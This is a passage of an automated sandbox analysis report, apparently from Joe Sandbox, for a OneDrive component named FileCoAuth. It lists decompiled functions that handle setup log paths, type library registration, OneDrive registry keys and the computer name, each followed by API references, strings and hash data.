    				__imp__SHGetSpecialFolderPathW(0, _t29, 0x23, 0, (_t22 & 0xffffff00 | __ecx != 0x00000000) & 0x000000ff, L"d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\watsonreport.cpp", 0x117, L"WatsonReport::GetSetupLogsLocation", L"(pSetupLogsLocation != NULL)", L"Expected non-NULL setup log location", 0x2c4);
    				_t68 = _t29 - 1;
    				if(_t29 == 1) {
    					memset(_t62 - 0x2b8, 0, 0x98);
    					_t50 = _t62 - 0x2b8;
    					E00E97773(0, _t50, _t59, 0x80004005, _t68);
    					 *((char*)(_t62 - 4)) = 1;
    					E00E99F8B(0, _t59, _t61, _t68);
    					E00E990AD(_t59, E00E9817A(_t62 - 0x2b8, _t62 - 0x2d0));
    					E00E94307(_t62 - 0x2d0, 1, 0);
    					_t61 = 0;
    					E00E97DF8();
    					__imp__??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ(E00E99D69(0, E00E97EF0(0, _t59, 0x80004005, _t68), _t59, 0x80004005, _t68), _t62 - 0x2b8, _t62 - 0x218, _t50, 0xeb1b1c, 2, 1);
    				}
    				E00E98588();
    				return E00EA3152(0, _t59, _t61);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A6A6
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9A70A
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000,00E991C2,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00E9A71D
    • memset.MSVCR120 ref: 00E9A739
      • Part of subcall function 00E97773: __EH_prolog3.LIBCMT ref: 00E9777A
      • Part of subcall function 00E97773: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP120(00000008,00E9833E,00000002,00000001), ref: 00E97797
      • Part of subcall function 00E97773: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP120(?,00000000,00000000,00000008,00E9833E,00000002,00000001), ref: 00E977AF
      • Part of subcall function 00E97EF0: __EH_prolog3_catch.LIBCMT ref: 00E97EF7
      • Part of subcall function 00E97EF0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
      • Part of subcall function 00E99D69: __EH_prolog3_catch.LIBCMT ref: 00E99D70
      • Part of subcall function 00E99D69: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000000,00000000,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E99F75
      • Part of subcall function 00E99F8B: __EH_prolog3_catch.LIBCMT ref: 00E99F92
      • Part of subcall function 00E99F8B: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000,?,00EB1B1C,00000002,00000001), ref: 00E9A0E4
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(00000001,00000000,00000000,?,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A7B6
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp, xrefs: 00E9A6E4
    • WatsonReport::GetSetupLogsLocation, xrefs: 00E9A6CF
    • (pSetupLogsLocation != NULL), xrefs: 00E9A6CA
    • WatsonReport::GetSetupLogsLocation, xrefs: 00E9A6B5
    • Expected non-NULL setup log location, xrefs: 00E9A6C5
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_$W@std@@@std@@$memset$?setstate@?$basic_ios@_H_prolog3_catch$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@_??3@ErrorFolderH_prolog3H_prolog3_LastPathSpecialV?$basic_streambuf@_W@std@@@1@__vsnwprintf
    • String ID: (pSetupLogsLocation != NULL)$Expected non-NULL setup log location$WatsonReport::GetSetupLogsLocation$WatsonReport::GetSetupLogsLocation$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\watsonreport.cpp
    • API String ID: 3049488461-3718693666
    • Opcode ID: 23241dac64a8b155c7002a1ec5878989389e175af70ff4b561b19c3ab83a3f2f
    • Instruction ID: ae865fef3edac0fba760981f7cb8a63b19f657d58feae15153a550d50b933320
    • Opcode Fuzzy Hash: 23241dac64a8b155c7002a1ec5878989389e175af70ff4b561b19c3ab83a3f2f
    • Instruction Fuzzy Hash: D7215671A803186ADF54EB70CD8AFEE73AD9F29700F005599B109B61D2EE749F89CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 24%
    			E00E9A0FC(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t22;
    				intOrPtr _t23;
    				void* _t26;
    				intOrPtr* _t32;
    				signed int _t36;
    				signed int _t46;
    				void* _t49;
    
    				E00EA3194(E00EA3DA7, __ebx, __edi, __esi);
    				_t32 = __ecx;
    				_t48 = 0;
    				__imp__??0_Lockit@std@@QAE@H@Z(0, 0x18);
    				 *((intOrPtr*)(_t49 - 4)) = 0;
    				_t22 =  *0xeb2344;
    				 *(_t49 - 0x18) = _t22;
    				__imp__??Bid@locale@std@@QAEIXZ();
    				_t46 = _t22;
    				_t23 =  *__ecx;
    				if(_t46 >=  *((intOrPtr*)(_t23 + 0xc))) {
    					_t36 = 0;
    				} else {
    					_t36 =  *( *((intOrPtr*)(_t23 + 8)) + _t46 * 4);
    				}
    				if(_t36 != 0 ||  *((intOrPtr*)(_t23 + 0x14)) == _t36) {
    					_t48 = _t36;
    				} else {
    					__imp__?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ();
    					if(_t46 <  *((intOrPtr*)(_t23 + 0xc))) {
    						_t48 =  *( *((intOrPtr*)(_t23 + 8)) + _t46 * 4);
    					}
    				}
    				if(_t48 == 0) {
    					_t48 =  *(_t49 - 0x18);
    					if( *(_t49 - 0x18) == 0) {
    						_t26 = _t49 - 0x18;
    						__imp__?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z(_t26, _t32);
    						if(_t26 == 0xffffffff) {
    							__imp__??0bad_cast@std@@QAE@PBD@Z("bad cast");
    							_push(0xeadb70);
    							_push(_t49 - 0x24);
    							L00EA3138();
    						}
    						_t48 =  *(_t49 - 0x18);
    						 *0xeb2344 = _t48;
    						E00EA35D7( *((intOrPtr*)( *_t48 + 4))(), _t48);
    					}
    				}
    				__imp__??1_Lockit@std@@QAE@XZ();
    				return E00EA3152(_t32, _t46, _t48);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9A103
    • ??0_Lockit@std@@QAE@H@Z.MSVCP120(00000000,00000018,00E99E0C,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A110
    • ??Bid@locale@std@@QAEIXZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A127
    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A149
    • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP120(?,?,?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A16E
    • ??0bad_cast@std@@QAE@PBD@Z.MSVCR120(bad cast,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A183
    • _CxxThrowException.MSVCR120(?,00EADB70), ref: 00E9A192
    • std::_Facet_Register.LIBCPMT ref: 00E9A1A8
    • ??1_Lockit@std@@QAE@XZ.MSVCP120(?,0000003C,00E9A633,?,?,00EB1A44,00EB1AEC,00EB1A44,00EB1A44,00000002,00000001), ref: 00E9A1B1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Lockit@std@@$??0_??0bad_cast@std@@??1_Bid@locale@std@@ExceptionFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@H_prolog3_Locimp@12@RegisterThrowV42@@Vfacet@locale@2@W@std@@std::_
    • String ID: bad cast
    • API String ID: 2931621279-3145022300
    • Opcode ID: 2db2441297426bf31e9e2c09719d678a2b8e2c22c265655f95e9ad73c32c1997
    • Instruction ID: eb50a3a70d5d55acb5034382c81b73417c92a04d1f2f94163c903143eaae0638
    • Opcode Fuzzy Hash: 2db2441297426bf31e9e2c09719d678a2b8e2c22c265655f95e9ad73c32c1997
    • Instruction Fuzzy Hash: A821C6B5A022118FCF14DF65D8558AD77B1EF4E320B191169E501BB3A0CB30BD05CBE1
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00E92965(void* __ecx, intOrPtr* __edx, void* __eflags, signed int* _a4) {
    				signed int _v0;
    				signed int _v8;
    				short _v10;
    				signed int _v12;
    				char _v528;
    				void* _v532;
    				char _v536;
    				void* _v540;
    				signed int _v584;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t48;
    				intOrPtr* _t53;
    				intOrPtr* _t57;
    				void* _t58;
    				_Unknown_base(*)()* _t59;
    				struct HINSTANCE__* _t61;
    				signed int _t62;
    				void* _t67;
    				signed int* _t68;
    				WCHAR* _t76;
    				void* _t77;
    				WCHAR* _t78;
    				intOrPtr* _t80;
    				signed int _t86;
    				void* _t87;
    				signed int _t91;
    				void* _t93;
    				void* _t95;
    				WCHAR* _t96;
    				void* _t99;
    				intOrPtr* _t101;
    				char* _t103;
    				void* _t104;
    				intOrPtr* _t105;
    				signed int _t108;
    				signed int _t109;
    
    				_t89 = __edx;
    				_t48 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t48 ^ _t109;
    				_push(_t93);
    				_t103 = 0;
    				_v536 = 0;
    				_v532 = 0;
    				if(E00E923DD(__ecx, __edx, _t93,  &_v536,  &_v532) < 0) {
    					L16:
    					_t53 = _v532;
    					if(_t53 != 0) {
    						 *((intOrPtr*)( *_t53 + 8))(_t53);
    					}
    					__imp__#6(_v536);
    					_pop(_t95);
    					_pop(_t104);
    					return E00EA29F2(_t77, _v8 ^ _t109, _t89, _t95, _t104);
    				} else {
    					_t57 = _v532;
    					_t89 =  &_v540;
    					_v540 = 0;
    					_t58 =  *((intOrPtr*)( *_t57 + 0x24))(_t57, 0xffffffff, 0, 0, 0, _t89);
    					if(_t58 < 0 || _v540 == 0) {
    						L11:
    						if( *0xeb2330 != 1) {
    							L14:
    							_t59 = __imp__#163;
    						} else {
    							_t61 = GetModuleHandleW(L"OLEAUT32.DLL");
    							if(_t61 == 0) {
    								goto L14;
    							} else {
    								_t59 = GetProcAddress(_t61, "RegisterTypeLibForUser");
    								if(_t59 == 0) {
    									goto L14;
    								}
    							}
    						}
    						 *_t59(_v532, _v536, _t103);
    						__imp__#6(_v540);
    						goto L16;
    					} else {
    						__imp__#7(_v540, _t77);
    						_t62 =  &_v528;
    						__imp__wcsncpy_s(_t62, 0x104, _v540, _t58);
    						_t86 = _t62;
    						L00E91E60(_t86);
    						_t96 =  &_v528;
    						_t78 = _t96;
    						_v10 = 0;
    						if(_v528 != 0) {
    							do {
    								_t76 = CharNextW(_t78);
    								_t86 =  *_t78 & 0x0000ffff;
    								if(_t86 == 0x5c || _t86 == 0x2f || _t86 == 0x3a) {
    									_t96 = _t76;
    								}
    								_t78 = _t76;
    							} while ( *_t76 != _t103);
    						}
    						_t99 = (_t96 -  &_v528 >> 1) + (_t96 -  &_v528 >> 1);
    						_pop(_t77);
    						if(_t99 >= 0x208) {
    							E00EA2D1C();
    							asm("int3");
    							_push(_t109);
    							_push(_t86);
    							_v584 = _t86;
    							_push(_t77);
    							_push(_t103);
    							_t105 = _t89;
    							_push(_t99);
    							if(_t86 == 0 || _t105 == 0) {
    								_t67 = 0x80070057;
    							} else {
    								_t68 = _a4;
    								if(_t68 != 0) {
    									_t101 = _v0;
    									if( *_t101 != 0 ||  *((intOrPtr*)(_t101 + 4)) != 0 ||  *((intOrPtr*)(_t101 + 8)) != 0xc0 ||  *((intOrPtr*)(_t101 + 0xc)) != 0x46000000) {
    										while(1) {
    											_t80 =  *((intOrPtr*)(_t105 + 8));
    											if(_t80 == 0) {
    												break;
    											}
    											_t91 = 0 |  *_t105 == 0x00000000;
    											_v0 = _t91;
    											if(_t91 != 0) {
    												L33:
    												if(_t80 == 1) {
    													goto L28;
    												} else {
    													_t87 =  *_t80(_t86, _t101, _t68,  *((intOrPtr*)(_t105 + 4)));
    													if(_t87 == 0) {
    														goto L29;
    													} else {
    														if(_v0 != 0 || _t87 >= 0) {
    															goto L37;
    														} else {
    															L40:
    															 *_a4 =  *_a4 & 0x00000000;
    															_t67 = _t87;
    														}
    													}
    												}
    											} else {
    												if(E00E91E21( *_t105, _t101) == 0) {
    													L37:
    													_t68 = _a4;
    													_t105 = _t105 + 0xc;
    													_t86 = _v12;
    													continue;
    												} else {
    													_t68 = _a4;
    													_t86 = _v12;
    													goto L33;
    												}
    											}
    											goto L42;
    										}
    										_t87 = 0x80004002;
    										goto L40;
    									} else {
    										L28:
    										_t108 =  *((intOrPtr*)(_t105 + 4)) + _t86;
    										 *((intOrPtr*)( *_t108 + 4))(_t108);
    										 *_a4 = _t108;
    										L29:
    										_t67 = 0;
    									}
    								} else {
    									_t67 = 0x80004003;
    								}
    							}
    							L42:
    							return _t67;
    						} else {
    							_t103 =  &_v528;
    							 *((short*)(_t109 + _t99 - 0x20c)) = 0;
    							goto L11;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
    • #7.OLEAUT32(?), ref: 00E929E0
    • wcsncpy_s.MSVCR120 ref: 00E929F9
    • CharNextW.USER32(?), ref: 00E92A21
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E92A79
    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E92A89
    • #6.OLEAUT32(?), ref: 00E92AAF
    • #6.OLEAUT32(?,?,?), ref: 00E92ACB
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressCharFileHandleNameNextProcwcsncpy_s
    • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
    • API String ID: 1786792091-2666564778
    • Opcode ID: 786d2322b70b3b60198d1959d63743b9e27ec45ceda481c6981ee3c54bac89ed
    • Instruction ID: 32d08df41beea796ff9b8b9da709d2536cc76845cdf23c32a1f78b99751be9eb
    • Opcode Fuzzy Hash: 786d2322b70b3b60198d1959d63743b9e27ec45ceda481c6981ee3c54bac89ed
    • Instruction Fuzzy Hash: 2941C672A0022DAFCF309B65CC8CADA7BB9EF49314F044699E519B7150DA709E85CF90
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
      • Part of subcall function 00E982B9: GetLastError.KERNEL32(BB40E64E,?,?,?,?,?,00EA3B19,000000FF,?,00E967F9,?,d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp,000001D1,Win32Api::TaskDialogIndirect,pTaskConfig != NULL,pTaskConfig was NULL), ref: 00E98313
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98329
      • Part of subcall function 00E982B9: memset.MSVCR120 ref: 00E98369
      • Part of subcall function 00E982B9: _vsnwprintf.MSVCR120 ref: 00E98385
    • memset.MSVCR120 ref: 00E9695C
    • GetComputerNameExW.KERNEL32(00000001,?,00000040), ref: 00E96978
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: memset$ComputerErrorLastName_vsnwprintf
    • String ID: (result != 0) && (buffer[0] != 'L\0')$@$Couldn't get computer name.$Null argument: pComputerName$Win32Api::GetComputerNameW$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\win32api.cpp$pComputerName != NULL
    • API String ID: 2237044859-3925666673
    • Opcode ID: 18c88fb24d84b3ec6baf5797581d397d8eaade2c1e1474b3e63fa20b502546a6
    • Instruction ID: a13b1344e842a14a7918886c73e42990076b959e73e897350fe3700ffcaac93a
    • Opcode Fuzzy Hash: 18c88fb24d84b3ec6baf5797581d397d8eaade2c1e1474b3e63fa20b502546a6
    • Instruction Fuzzy Hash: 3311DA72A443407BDA10EB759C46F6B77DCEBCAB10F00651AB684FB181EA74E90487B6
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 91%
    			E00E9D143(void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed short _t80;
    				signed short _t84;
    				int _t97;
    				intOrPtr* _t121;
    				void* _t147;
    				long _t149;
    				int _t151;
    				void* _t152;
    
    				_t147 = __edx;
    				_push(0x6c);
    				E00EA3194(E00EA481D, __ebx, __edi, __esi);
    				_t151 = __ecx;
    				 *((intOrPtr*)(_t152 - 0x78)) = __ecx;
    				_t79 =  >=  ?  *0xeb1368 : 0xeb1368;
    				_t121 = 0;
    				_t80 = RegOpenKeyExW(0x80000001,  >=  ?  *0xeb1368 : 0xeb1368, 0, 0x20119, _t152 - 0x60);
    				_t149 = 0x80070000;
    				_t126 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
    				_t156 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
    				if(( <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000) < 0) {
    					L13:
    					return E00EA3152(_t121, _t149, _t151);
    				}
    				 *(_t152 - 0x64) = 0;
    				 *(_t152 - 0x5c) = 0;
    				_t84 = RegQueryInfoKeyW( *(_t152 - 0x60), 0, 0, 0, _t152 - 0x64, _t152 - 0x5c, 0, 0, 0, 0, 0, 0);
    				_t129 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
    				_t158 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
    				if(( <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000) < 0) {
    					L12:
    					RegCloseKey( *(_t152 - 0x60));
    					goto L13;
    				}
    				_t121 = _t151 + 0x1c;
    				E00E9E4BB(_t84,  *_t121,  *((intOrPtr*)(_t121 + 4)));
    				 *((intOrPtr*)(_t121 + 4)) =  *_t121;
    				E00E94E9D(_t152 - 0x40, L"MainAccount");
    				 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
    				E00E94E9D(_t152 - 0x28, L"Software\\Microsoft\\OneDrive");
    				 *(_t152 - 4) = 1;
    				E00E9F290(0x80000001, _t152 - 0x28, _t152 - 0x40, 0, _t151 + 0x28);
    				 *(_t152 - 4) = 0;
    				E00E94307(_t152 - 0x28, 1, 0);
    				 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
    				E00E94307(_t152 - 0x40, 1, 0);
    				_t97 =  *(_t152 - 0x5c) + 1;
    				_t151 = 0;
    				 *(_t152 - 0x5c) = _t97;
    				while(1) {
    					_t160 = _t151 -  *(_t152 - 0x64);
    					if(_t151 >=  *(_t152 - 0x64)) {
    						goto L12;
    					}
    					 *(_t152 - 0x74) =  *(_t152 - 0x74) & 0x00000000;
    					 *(_t152 - 0x34) =  *(_t152 - 0x34) & 0x00000000;
    					 *(_t152 - 0x30) =  *(_t152 - 0x30) & 0x00000000;
    					 *(_t152 - 0x2c) =  *(_t152 - 0x2c) & 0x00000000;
    					_push(_t152 - 0x74);
    					_push(_t97);
    					E00E9E365(_t121, _t152 - 0x34, _t149, _t151, _t160);
    					 *(_t152 - 4) = 2;
    					 *(_t152 - 0x70) =  *(_t152 - 0x5c);
    					_t149 = RegEnumKeyExW( *(_t152 - 0x60), _t151,  *(_t152 - 0x34), _t152 - 0x70, 0, 0, 0, 0);
    					if(_t149 >= 0) {
    						E00E94E9D(_t152 - 0x28,  *(_t152 - 0x34));
    						 *(_t152 - 4) = 3;
    						if(E00E99650(_t152 - 0x28, 0,  *((intOrPtr*)(_t152 - 0x18)), L"Tenants", E00E94E74(L"Tenants")) != 0) {
    							 *(_t152 - 0x6c) =  *(_t152 - 0x6c) & 0x00000000;
    							 *(_t152 - 0x68) =  *(_t152 - 0x68) & 0x00000000;
    							 *(_t152 - 4) = 5;
    							E00E9D36E(_t121,  *((intOrPtr*)(_t152 - 0x78)), _t147, _t149, _t151, __eflags,  *(_t152 - 0x60), _t152 - 0x28, _t152 - 0x6c);
    							_push(_t152 - 0x6c);
    							E00E9EB0A(_t121, _t121);
    							 *(_t152 - 4) = 3;
    							_t143 =  *(_t152 - 0x68);
    							__eflags =  *(_t152 - 0x68);
    							if( *(_t152 - 0x68) != 0) {
    								E00E92DF6(_t143);
    							}
    						} else {
    							_t115 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
    							E00E94E9D(_t152 - 0x58,  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28);
    							 *(_t152 - 4) = 4;
    							E00E9EE8E( *(_t152 - 0x60), _t152 - 0x58, 0);
    							 *(_t152 - 4) = 3;
    							E00E94307(_t152 - 0x58, 1, 0);
    						}
    						 *(_t152 - 4) = 2;
    						E00E94307(_t152 - 0x28, 1, 0);
    					}
    					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
    					E00E98AA7(_t152 - 0x34);
    					_t151 = _t151 + 1;
    					if(_t149 < 0) {
    						goto L12;
    					} else {
    						_t97 =  *(_t152 - 0x5c);
    						continue;
    					}
    				}
    				goto L12;
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9D14A
    • RegOpenKeyExW.ADVAPI32(80000001,00EB1368,00000000,00020119,?,0000006C,00E9CBE7,00000000,?,?,?,00000008), ref: 00E9D179
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000008), ref: 00E9D1B0
    • RegCloseKey.ADVAPI32(?,?,?,?,00000008), ref: 00E9D362
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9E365: __EH_prolog3_catch.LIBCMT ref: 00E9E36C
    • RegEnumKeyExW.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00E9D283
      • Part of subcall function 00E9D36E: __EH_prolog3_GS.LIBCMT ref: 00E9D378
      • Part of subcall function 00E9D36E: ??2@YAPAXI@Z.MSVCR120 ref: 00E9D3A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseH_prolog3_OpenQuery$??2@??3@EnumH_prolog3_catchInfoValue
    • String ID: MainAccount$Software\Microsoft\OneDrive$Tenants
    • API String ID: 41312333-3841344580
    • Opcode ID: ce1af32d76f00d8c68198e565b5471603aa60db858e50b1aa8a5acb623498a10
    • Instruction ID: e06650177af10dbbf760e96a0b9b1b14acd3ae2f90a5ccd94ab95252e7101490
    • Opcode Fuzzy Hash: ce1af32d76f00d8c68198e565b5471603aa60db858e50b1aa8a5acb623498a10
    • Instruction Fuzzy Hash: 8E6156B1900218AEEF05DBE4CC85FEEBBB9EF09315F145029E501BB191DB70AA09CB61
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 29%
    			E00E923DD(struct HINSTANCE__* __ecx, signed int __edx, void* __edi, signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				char _v20;
    				short _v560;
    				signed int* _v564;
    				intOrPtr _v568;
    				void* __ebx;
    				void* __esi;
    				signed int _t20;
    				signed int* _t22;
    				long _t26;
    				WCHAR* _t27;
    				WCHAR* _t28;
    				signed int _t29;
    				WCHAR* _t38;
    				signed int* _t40;
    				signed short _t44;
    				signed int* _t46;
    				intOrPtr _t47;
    				signed int _t49;
    				signed int _t50;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t58;
    				signed int _t62;
    
    				_t54 = __edi;
    				_t51 = __edx;
    				_t20 =  *0xeb0090; // 0xbd336131
    				_v8 = _t20 ^ _t62;
    				_t22 = _a4;
    				_v564 = _t22;
    				_t40 = _a8;
    				if(_t22 == 0 || _t40 == 0) {
    					goto L21;
    				} else {
    					 *_t22 =  *_t22 & 0x00000000;
    					 *_t40 =  *_t40 & 0x00000000;
    					_push(_t56);
    					_t26 = GetModuleFileNameW(__ecx,  &_v560, 0x104);
    					if(_t26 != 0) {
    						if(_t26 != 0x104) {
    							_t44 = _v560;
    							_t27 =  &_v560;
    							_t58 = 0;
    							if(_t44 == 0) {
    								L13:
    								_t59 =  ==  ? _t27 : _t58;
    								_t28 =  &_v560;
    								_v568 =  ==  ? _t27 : _t58;
    								__imp__#161(_t28, _t40);
    								if(_t28 >= 0) {
    									L17:
    									_t29 =  &_v560;
    									__imp__#2(_t29);
    									 *_v564 = _t29;
    									if(_t29 == 0) {
    										_t46 =  *_t40;
    										_t51 =  *_t46;
    										 *((intOrPtr*)( *_t46 + 8))(_t46);
    										 *_t40 =  *_t40 & 0x00000000;
    									}
    									goto L19;
    								}
    								_t47 = _v568;
    								_t51 = _t47 -  &_v560 >> 1;
    								asm("movsd");
    								asm("movsd");
    								asm("movsw");
    								_t54 = _t54;
    								if((_t47 -  &_v560 >> 1) + 5 <= 0x104) {
    									__imp__wcscpy_s(_t47, 0x10e,  &_v20);
    									L00E91E60(0x10e - _t51);
    									_t38 =  &_v560;
    									__imp__#161(_t38, _t40);
    									if(_t38 < 0) {
    										goto L19;
    									}
    									goto L17;
    								}
    								goto L19;
    							}
    							_t49 = _t44 & 0x0000ffff;
    							do {
    								_t50 = _t49 & 0x0000ffff;
    								if(_t50 == 0x2e) {
    									_t58 = _t27;
    								} else {
    									if(_t50 == 0x5c) {
    										_t58 = 0;
    									}
    								}
    								_t27 = CharNextW(_t27);
    								_t49 =  *_t27 & 0x0000ffff;
    							} while (_t49 != 0);
    							goto L13;
    						}
    						goto L19;
    					} else {
    						E00E91EF0();
    						L19:
    						_pop(_t56);
    						L21:
    						return E00EA29F2(_t40, _v8 ^ _t62, _t51, _t54, _t56);
    					}
    				}
    			}

    APIs
